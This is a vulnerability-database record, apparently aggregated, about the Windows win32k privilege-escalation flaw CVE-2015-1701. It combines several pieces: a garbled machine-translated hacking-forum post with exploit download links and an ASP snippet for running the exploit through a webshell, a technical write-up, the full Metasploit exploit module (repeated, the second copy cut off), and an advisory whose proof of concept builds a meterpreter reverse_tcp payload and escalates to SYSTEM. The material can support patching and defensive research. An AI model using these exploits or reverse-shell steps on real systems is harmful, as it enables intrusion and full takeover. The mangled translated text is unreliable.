\nThe original source of information is the Fireye reported in the Russian APT28 team with the 0day to: \nOperation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia's APT28 in Highly-Targeted Attack \nhttps://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html \n\nProtection \nApply MS15-0 5 1 for fix. https://technet.microsoft.com/library/security/MS15-051 \n\nDownload \nTaihou64.exe \u548c Taihou32.exe \nhttps://github.com/hfiref0x/CVE-2015-1701/tree/master/Compiled \nSource: https://github.com/hfiref0x/CVE-2015-1701/tree/master/Source \n\nTest as shown in Figure: \n! [](/Article/UploadPic/2015-5/2015523233829579.jpg) \n\nms15-0 5 1 modified version \nPlus a 2 0 0 3 Support, and the streamlining of the part of the code, together with the ntdll. lib the library, and finally support in the webshell. \nThe original code is even compiled into 2 0 0 3-compatible format in 0 3 is not performed, because of win7 the following system does not export user32! gSharedInfo, only parsing the pdb or search pattern to locate; in addition to the different systems of the EPROCESS->Token offset is also different, these modifications in engineering have been added. \nEngineering is the vs2010 source code can be directly compiled. Project comes with two compiled exp, in 2 0 0 3 6 4-bit and 3 2 bits are tested successful. I tested with the virtual machine version is sp2, does not guarantee that other versions can be used. \nIf you find a version can not be used while the version number to tell me, I then modify(with a corresponding version of the system is a mirror download address is the best though). \nThis vulnerability does not affect Windows 8 and above versions, so can only do these. \nNote: the attachment in the exe with a kitchen knife to perform the words not taken back significantly, in fact, the command has been executed, if the output of the pid. 
\nIn aspxspy execution is not a problem, the chopper of the asp of the horse can use the following script: \nset x=createobject(\"wscript. shell\"). exec(\"c:\\inetpub\\wwwroot\\ms15-051.exe \"\"whoami /all\"\"\") \nresponse. write (x. stdout. readall & x. stderr. readall) \n\nThe source code has been updated, re-compile again no problem. \nTest screenshot: \n! [](/Article/UploadPic/2015-5/2 0 1 5 5 2 3 2 3 3 8 3 2 1 8 3. png) \n\nDownload: \n! [](/Article/UploadPic/2015-5/2 0 1 5 5 2 3 2 3 3 8 3 4 4 4 4. png) \nms15-051.zip \nBaidu network disk: the http://pan.baidu.com/s/1eQ1ZOzC \nUnzip password see note \n\n", "modified": "2015-05-24T00:00:00", "published": "2015-05-24T00:00:00", "id": "MYHACK58:62201562817", "href": "http://www.myhack58.com/Article/html/3/62/2015/62817.htm", "type": "myhack58", "title": "Win32k elevation of privilege vulnerability, CVE-2 0 1 5-1 7 0 1-exp-vulnerability warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-12T18:25:58", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "edition": 1, "description": "Ticker 2 0 1 5 year 5 month 1 2 day, Microsoft pushed a 5-month patch day patch includes IE, Windows kernel, Windows kernel driver, Office and other components of the security updates. This month the repair of the two 0day vulnerabilities \nMS15-0 5 2 are fixed in the Windows kernel security feature bypass Vulnerability: CVE-2 0 1 5-1 6 7 4 out of https://technet.microsoft.com/en-us/library/security/MS15-052\uff09 \nMS15-0 5 1 fixed in the Windows kernel-mode drivers elevation of Privilege vulnerabilities: CVE-2 0 1 5-1 7 0 1 at https://technet.microsoft.com/en-us/library/security/MS15-051 also attracted our attention. 
After confirming, the CVE-2 0 1 5-1 6 7 4 I 2 0 1 4 years found a kernel-KASLR bypass Vulnerability, CVE-2 0 1 5-1 7 0 1 It is Fireeye in this year 4 month 1 8 day release on Operation RussianDoll Russian matryoshka operations, the report found, the Russian APT28 hacker group launched for the extremely particular target of attack for privilege escalation kernel 0day vulnerabilities, in Microsoft released a patch on the line at the same time, from the Russian security community kernelmode. info hack hfiref0x also in his Github announced for the CVE-2 0 1 5-1 7 0 1 vulnerability of the complete attack code https://github.com/hfiref0x/CVE-2015-1701 in. The Blog author on this three month repair of the 0day vulnerability, talk about their principles, details and repair methods and some of the surrounding information. \n0x01 CVE-2 0 1 5-1 6 7 4/MS15-0 5 2 \nVulnerability information \nMS15-0 5 2 Microsoft designed to fix CVE-2 0 1 5-1 6 7 4 vulnerabilities released for CNG. sys security updates. The vulnerability is real and the author in the last 1 0 months Microsoft released Windows 1 0 the first preview Edition 9 8 6 0 when released an article this http://weibo.com/1648808737/BpGpHhEyD on the description of the vulnerability, CVE-2 0 1 5-0 0 1 0/MS05-0 1 0, the https://technet.microsoft.com/library/security/MS15-010 is the same issue belongs to the Microsoft in fix for CVE-2 0 1 5-0 0 1 0 did not fix completely, the legacy of security vulnerabilities. \nIn Windows 1 0 after the release, the author on which to test the two KASLR bypass vulnerabilities, A is j00ru at NoSuchCon 2 0 1 3 published on the use of a kernel KiTrap01 handling the Debug exception the problem of detection of the kernel address to bypass KASLR issues http://j00ru.vexillium.org/blog/21_05_13/nsc2013_slides.pdf another one is the author of in 2 0 1 4 in reverse Windows 8.1 kernel find a CNG. 
sys in the presence of not yet disclosed KASLR bypass vulnerability, at the time the release of Windows 9 8 6 0 preview Edition, these two loopholes have not been fixed. \nDue to CNG. sys device(\\Device\\CNG)is one of the few settings of ALL APPLICATION PACKAGES DACL, thereby allowing a high degree of isolation, the AppContainer also can feel free to access the device, and this problem affects both x86 and x64 systems j00ru the KASLR bypass can only be used for x86 systems, and therefore the latter is more practical. This vulnerability is 360Vulcan Team to Pwn2Own type of the game reserves of the kernel vulnerability/defect one, and Microsoft for KASLR bypasses the type of vulnerability has been relatively ambiguous attitude j00ru the KASLR bypass the until now Windows 1 0 latest version 1 0 0 7 4 still has not been fixed, so the author will not be this vulnerability is reported to Microsoft, this patch of Japan, the CVE-2 0 1 5-1 6 7 4 that is, the author here mentioned the vulnerability. \nMay be due to the vulnerability affects IE and Spartan in the EPM\uff08enhanced protected mode, mainly using the AppContainer protection), Microsoft decided in Windows 1 0. new version to fix this vulnerability, we see that in 2 0 1 5 \u5e74 1 \u6708 released Windows 1 0 9 9 2 6, Microsoft has quietly completely fixes this vulnerability, while in 2 month's patch day, Microsoft also is similarly affected Windows 8/8. 1/Server 2 0 1 2/Server 2 0 1 2 R2 push the MS05-0 1 0 to try to fix this problem. \nBut it is interesting that, in the MS05-0 1 0, although Microsoft has given the vulnerability CVE-2 0 1 5-0 0 1 0 The number, but did not completely fix this problem, cause this loophole in the final Pwn2Own 2 0 1 5 is from Korean players lokihardt use compromised Windows kernel. It is also because of Pwn2Own 2 0 1 5, Microsoft again released MS15-0 5 2 Security Update for the vulnerability is changed to a new number: CVE-2 0 1 5-1 6 7 4 in. 
In fact this \u201cnew\u201d vulnerability and CVE-2015-0010 are almost exactly the same problem: it is a legacy of the incomplete fix for CVE-2015-0010. What is puzzling is that in Windows 10 build 9926 the CVE-2015-0010 and CVE-2015-1674 problems were fixed in one go; one has to say that during the development of Windows 10, Microsoft's patch repair and management seem to have suffered from negligence and confusion, which gave rise to the current problem. \nZDI has already disclosed some details of this vulnerability on its official website (http://www.zerodayinitiative.com/advisories/ZDI-15-189/); since the attack surface of cng.sys is small, experienced security researchers can already find the details of the hole relatively easily from that information, so the author describes the specifics of the vulnerability directly here. \nVulnerability details \nThis vulnerability exists in the device control handling code of cng.sys. CNG.SYS is Microsoft's next-generation kernel cryptography driver; through device control (DeviceControl) and exported functions it provides a large number of cryptography-related interfaces. Like many Windows kernel drivers, it mixes control functions open to other kernel drivers with those open to user-mode programs in the same device control handling, which is often the source of many kernel security vulnerabilities; in my ISC 2014 talk on 360 XP Shield Armor 3.0 kernel protection I mentioned a similar KASLR bypass problem that once affected the Windows system and still affects the control interfaces of many important third-party drivers. \nCNG.sys is special in that the device it creates (\\Device\\CNG) is given a special security descriptor via ObSetSecurityObjectByPointer; this security descriptor grants users with ALL APPLICATION PACKAGES permissions full control of the device. 
Anyone with even a slight understanding of Microsoft's AppContainer/EPM mechanism may know that with the device permissions set this way, even the rendering process in IE or Spartan isolation protection mode can access CNG directly. The purpose of this setting is also to let all processes access its associated interfaces, so in the driver's IRP_MJ_CREATE handling any access is allowed directly, without any checks; that is, the CNG.SYS interfaces can be accessed freely even by a process protected by IE/Spartan protected mode or enhanced protected mode. \nIn the CNG.SYS device control code, a number of control codes are dedicated to use by external drivers, such as 0x39024, 0x39040, 0x39044, 0x39048, 0x39064, etc. These device control codes return to the caller the addresses of a series of functions implemented inside CNG, including the FIPSSHA, FIPS3Des, HMAC MD5, FIPS GenRandom, SSL encryption/decryption and key management, and BCrypto series interfaces; in this way an external driver can call these functions directly to perform the associated cryptographic operations without having to implement the interfaces itself. \nThe problem is that for these interfaces intended for external kernel-mode drivers there is no check of whether the IRP originates from kernel mode, so a user-mode program can likewise invoke these device control codes directly via the DeviceIoControl function and obtain these function interfaces. Of course a user-mode program cannot use these interfaces directly, but combined with the layout of the CNG.SYS image, the user-mode program can derive the CNG.sys base address and the positions of relevant key data, thus completely bypassing Microsoft's kernel KASLR (kernel-mode address randomization) technique. 
\n\n\n**[1] [[2]](<62366_2.htm>) [[3]](<62366_3.htm>) [[4]](<62366_4.htm>) [next](<62366_2.htm>)**\n", "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2015/62366.htm", "id": "MYHACK58:62201562366", "type": "myhack58", "title": "About 1 5 years 5 months to repair the two 0day-vulnerability warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:08", "description": "", "published": "2015-06-22T00:00:00", "type": "packetstorm", "title": "Microsoft Windows ClientCopyImage Improper Object Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-06-22T00:00:00", "id": "PACKETSTORM:132403", "href": "https://packetstormsecurity.com/files/132403/Microsoft-Windows-ClientCopyImage-Improper-Object-Handling.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/post/windows/reflective_dll_injection' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'Windows ClientCopyImage Win32k Exploit', \n'Description' => %q{ \nThis module exploits improper object handling in the win32k.sys kernel mode driver. \nThis module has been tested on vulnerable builds of Windows 7 x64 and x86, and \nWindows 2008 R2 SP1 x64. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Unknown', # vulnerability discovery and exploit in the wild \n'hfirefox', # Code released on github \n'OJ Reeves' # msf module \n], \n'Arch' => [ ARCH_X86, ARCH_X86_64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n}, \n'Targets' => [ \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ], \n[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] \n], \n'Payload' => { \n'Space' => 4096, \n'DisableNops' => true \n}, \n'References' => [ \n['CVE', '2015-1701'], \n['MSB', 'MS15-051'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'], \n['URL', 'https://github.com/hfiref0x/CVE-2015-1701'], \n['URL', 'https://technet.microsoft.com/library/security/MS15-051'] \n], \n'DisclosureDate' => 'May 12 2015', \n'DefaultTarget' => 0 \n})) \nend \n \ndef check \n# Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work) \n# Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works) \n# Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works) \n# Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works) \n \nif sysinfo['OS'] !~ /windows/i \nreturn Exploit::CheckCode::Unknown \nend \n \nif sysinfo['Architecture'] =~ /(wow|x)64/i \narch = ARCH_X86_64 \nelsif sysinfo['Architecture'] =~ /x86/i \narch = ARCH_X86 \nend \n \nfile_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys' \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nreturn Exploit::CheckCode::Safe if build == 7601 \n \nreturn Exploit::CheckCode::Detected \nend \n \ndef exploit \nif is_system? 
\nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown \nfail_with(Failure::NotVulnerable, 'Exploit not available on this system.') \nend \n \nif sysinfo['Architecture'] =~ /wow64/i \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Reader Sandbox won't allow to create a new process: \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_status('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \n \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nif target.arch.first == ARCH_X86 \ndll_file_name = 'cve-2015-1701.x86.dll' \nelse \ndll_file_name = 'cve-2015-1701.x64.dll' \nend \n \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name) \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \nprint_status(\"Exploit injected. 
Injecting payload into #{process.pid}...\") \npayload_mem = inject_into_process(process, payload.encoded) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \n \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132403/ms15_051_client_copy_image.rb.txt"}, {"lastseen": "2020-05-15T17:47:02", "description": "", "published": "2020-05-14T00:00:00", "type": "packetstorm", "title": "Cellebrite UFED 7.5.0.845 Desktop Escape / Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701", "CVE-2020-12798"], "modified": "2020-05-14T00:00:00", "id": "PACKETSTORM:157715", "href": "https://packetstormsecurity.com/files/157715/Cellebrite-UFED-7.5.0.845-Desktop-Escape-Privilege-Escalation.html", "sourceData": "`KL-001-2020-002 : Cellebrite Restricted Desktop Escape and Escalation of User Privilege \n \nTitle: Cellebrite Restricted Desktop Escape and Escalation of User Privilege \nAdvisory ID: KL-001-2020-002 \nPublication Date: 2020.05.14 \nPublication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Cellebrite \nAffected Product: UFED \nAffected Version: 5.0 - 7.5.0.845 \nPlatform: Embedded Windows \nCWE Classification: CWE-269: Improper Privilege Management, \nCWE-20: Input Validation Error \nCVE ID: CVE-2020-12798 \n \n \n2. Vulnerability Description \n \nCellebrite UFED device implements local operating system \npolicies that can be circumvented to obtain a command \nprompt. From there privilege escalation is possible using \npublic exploits. \n \n \n3. 
Technical Description \n \nThe Cellebrite UFED device implements local operating system \npolicies which are designed to limit access to operating system \nfunctionality. These include but may not be limited to: \n \n1. Preventing access to dialog such as Run, File Browser, \nand Explorer. \n \nand \n \n2. Preventing access to process and application management tools \nsuch as Task Manager and the Control Panel. \n \nThese policies can be circumvented by using functionality \nthat is permitted by the policy governing the use of the user \ndesktop. A user can leverage the Wireless Network connection \nstring to select certificate based authentication, which then \nenables file dialogs that are able to be used to launch a \ncommand prompt. Following this, privileges can be elevated \nusing off the shelf and publicly available exploits relevant \nto the specific Windows version in use. \n \n \n4. Mitigation and Remediation Recommendation \n \nThe vendor has informed KoreLogic that this vulnerability is \nnot present on devices manufactured \"at least since 2018.\" The \nvendor was uncertain of the exact version number that remediated \nthis attack vector. \n \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin (@thatguylevel) \nof KoreLogic, Inc. \n \n \n6. Disclosure Timeline \n \n2020.03.05 - KoreLogic submits vulnerability details to \nCellebrite. \n2020.03.17 - Cellebrite acknowledges receipt and the intention \nto investigate. \n2020.04.16 - KoreLogic requests an update on the status of the \nvulnerability report. \n2020.04.19 - Cellebrite responds, notifying KoreLogic that the \nvulnerable dialog is not available on newer UFED \nreleases. Indicates they will determine when the \nremediation was introduced. \n2020.05.04 - KoreLogic requests an update from Cellebrite. \n2020.05.05 - Cellebrite responds that they do not have the \nversion number at hand, but does not request \ndelaying public disclosure. \n2020.05.11 - MITRE issues CVE-2020-12798. 
\n2020.05.12 - 45 business-days have elapsed since the report was \nsubmitted to Cellebrite. \n2020.05.14 - KoreLogic public disclosure. \n \n \n7. Proof of Concept \n \nBegin by using the msfvenom binary to create a meterpreter \npayload that will initiate a remote connection to a C2. Copy \nthe payload to a USB drive. Following this, use the msfconsole \nbinary to create a C2 connection handler with the multi/handler \nfunctionality. \n \n$ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888 \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload \n[-] No arch selected, selecting arch: x86 from the payload \nNo encoder or badchars specified, outputting raw payload \nPayload size: 341 bytes \nFinal size of exe file: 73802 bytes \nSaved as: payload.exe \n$ sudo mount -o rw /dev/sda1 a/ \n$ sudo cp payload.exe a/ \n$ sync \n$ sudo umount a/ \n$ msfconsole \n[snip] \nmsf5 exploit(multi/handler) > show options \n \nModule options (exploit/multi/handler): \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \n \n \nPayload options (windows/meterpreter/reverse_tcp): \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nEXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) \nLHOST [REDACTED] yes The listen address (an interface may be specified) \nLPORT 8888 yes The listen port \n \n \nExploit target: \n \nId Name \n-- ---- \n0 Wildcard Target \n \n \nmsf5 exploit(multi/handler) > exploit -j -z \n[*] Exploit running as background job 1. \n[*] Exploit completed, but no session was created. \n[*] Started reverse TCP handler on [REDACTED]:8888 \n \nNow insert the USB drive where payload.exe resides into a \ntarget Cellebrite device. Next, follow the steps below: \n \n1. Open the Wireless Network Connection screen by clicking \non the WiFi icon in the bottom right hand corner of the \nscreen. 
This should be next to the system clock. \n \n2. Select \"Change advanced settings\" -- this will bring up a \nscreen called Windows Network Connection Properties. Choose \nthe Wireless Networks tab. \n \n3. Under the Preferred networks section, click the Add button \nand then select the Authentication tab. Make sure \"Enable IEEE \n802.1x authentication for this network\" is enabled. \n \n4. Under EAP Type, select \"Smart Card or other Certificate\" \nand then click the Properties button. \n \n5. Under Trusted Root Certificate Authorities click the \nView Certificate button. This will bring up a screen called \nCertificate, choose the Details tab and click the \"Copy to \nFile\" button. This will bring up a screen called Certificate \nExport Wizard. \n \n6. Click Next and select any of the available export format \noptions. For example, choose the \"DER encoded binary X.509\" \noption and click next. \n \n7. Instead of typing out a export path click the Browse \nbutton to open a file dialog. In the \"File Name\" box type: \n\\WINDOWS\\System32\\ and under \"Save as type\" select the \"All \nFiles (*.*)\" option. Hit the enter key. \n \n8. Locate the cmd.exe file then drag and drop any DLL over \nit. For example, choose the clusapi.dll file located near the \ncmd.exe executable. This will open a Command Prompt screen as \nan unprivileged user. \n \n9. Type the drive letter to change into the USB drive containing \nthe payload.exe file. \n \nC:\\windows\\system32>D: \nD:\\>payload.exe \n \nThis results in a connection back into Metasploit. \n \n[*] Sending stage (180291 bytes) to [REDACTED] \n[*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800 \nmsf5 exploit(multi/handler) > sessions -i 2 \n[*] Starting interaction with 2... 
\nmeterpreter > getuid \nServer username: TOUCH-[REDACTED]\\Operator \n \nAn exploit for CVE-2015-1701 is loaded up and configured to run \na local privilege escalation exploit against the unprivileged \nsession and SYSTEM is obtained. \n \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > show options \n \nModule options (exploit/windows/local/ms15_051_client_copy_image): \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nSESSION yes The session to run this module on. \n \n \nExploit target: \n \nId Name \n-- ---- \n0 Windows x86 \n \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2 \nSESSION => 2 \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp \nPAYLOAD => windows/meterpreter/reverse_tcp \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888 \nLPORT => 8888 \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED] \nLHOST => [REDACTED] \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > run \n \n[*] Started reverse TCP handler on [REDACTED]:8888 \n[*] Launching notepad to host the exploit... \n[+] Process 3936 launched. \n[*] Reflectively injecting the exploit DLL into 3936... \n[*] Injecting exploit into 3936... \n[*] Exploit injected. Injecting payload into 3936... \n[*] Payload injected. Executing exploit... \n[*] Sending stage (180291 bytes) to [REDACTED] \n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. \n[*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800 \n \nmeterpreter > getuid \nServer username: NT AUTHORITY\\SYSTEM \nmeterpreter > \n \n \n \nThe contents of this advisory are copyright(c) 2020 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. 
is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157715/KL-001-2020-002.txt"}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "edition": 2, "description": "**Name**| ms15_051 \n---|--- \n**CVE**| CVE-2015-1701 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| win32k.sys bServerSideWindowProc flag logic issue \n**Notes**| Repeatability: Infinite \nNotes: \nThis module exploits a vulnerability in the win32k.sys driver. \nThe bServerSideWindowProc flag on the window's handle structure is meant to be used to improve the performance of usercallbacks by replacing the call to a userland function with a kernel one. \nSetting this flag allows the window procedure to run in kernel mode. \nWhen creating a new window, after calling the ClientCopyImage usercallback, the kernel doesn't check the possibility that the bServerSideWindowProc could have been raised. And thus, execution continues as if the flag was unset. \nBy hooking ClientCopyImage it is possible to set the bServerSideWindowProc and define a new window procedure by calling the SetWindowLongPtr function on the newly created window. 
\nThis will lead to the execution of the defined window procedure in kernel mode. \n \nTested on: \nWindows XP SP3 x86 \nWindows 7 Professional x86 \nWindows 7 Professional SP1 x64 \nWindows Server 2003 Standard x64 \nWindows Server 2008 R2 Standard x64 SP1 \n \nThis exploit doesn't work on Windows 8.1 \n \nVENDOR: Microsoft \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701 \nCVE Name: CVE-2015-1701 \n\n", "modified": "2015-04-21T10:59:00", "published": "2015-04-21T10:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms15_051", "id": "MS15_051", "title": "Immunity Canvas: MS15_051", "type": "canvas", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-04T03:42:55", "edition": 2, "description": "This Metasploit module exploits improper object handling in the win32k.sys kernel mode driver. This Metasploit module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.", "published": "2015-06-23T00:00:00", "type": "zdt", "title": "Microsoft Windows ClientCopyImage Improper Object Handling Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-06-23T00:00:00", "id": "1337DAY-ID-23783", "href": "https://0day.today/exploit/description/23783", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\r\n 'Description' => 
%q{\r\n This module exploits improper object handling in the win32k.sys kernel mode driver.\r\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\r\n Windows 2008 R2 SP1 x64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # vulnerability discovery and exploit in the wild\r\n 'hfirefox', # Code released on github\r\n 'OJ Reeves' # msf module\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64 ],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' => [\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]\r\n ],\r\n 'Payload' => {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'References' => [\r\n ['CVE', '2015-1701'],\r\n ['MSB', 'MS15-051'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\r\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\r\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\r\n ],\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def check\r\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\r\n # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\r\n\r\n if sysinfo['OS'] !~ /windows/i\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /(wow|x)64/i\r\n arch = ARCH_X86_64\r\n elsif sysinfo['Architecture'] =~ /x86/i\r\n arch = ARCH_X86\r\n end\r\n\r\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\r\n major, minor, build, revision, branch = file_version(file_path)\r\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\r\n\r\n return Exploit::CheckCode::Safe if build == 7601\r\n\r\n return 
Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /wow64/i\r\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\r\n elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n # Reader Sandbox won't allow to create a new process:\r\n # stdapi_sys_process_execute: Operation failed: Access is denied.\r\n print_status('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n if target.arch.first == ARCH_X86\r\n dll_file_name = 'cve-2015-1701.x86.dll'\r\n else\r\n dll_file_name = 'cve-2015-1701.x64.dll'\r\n end\r\n\r\n 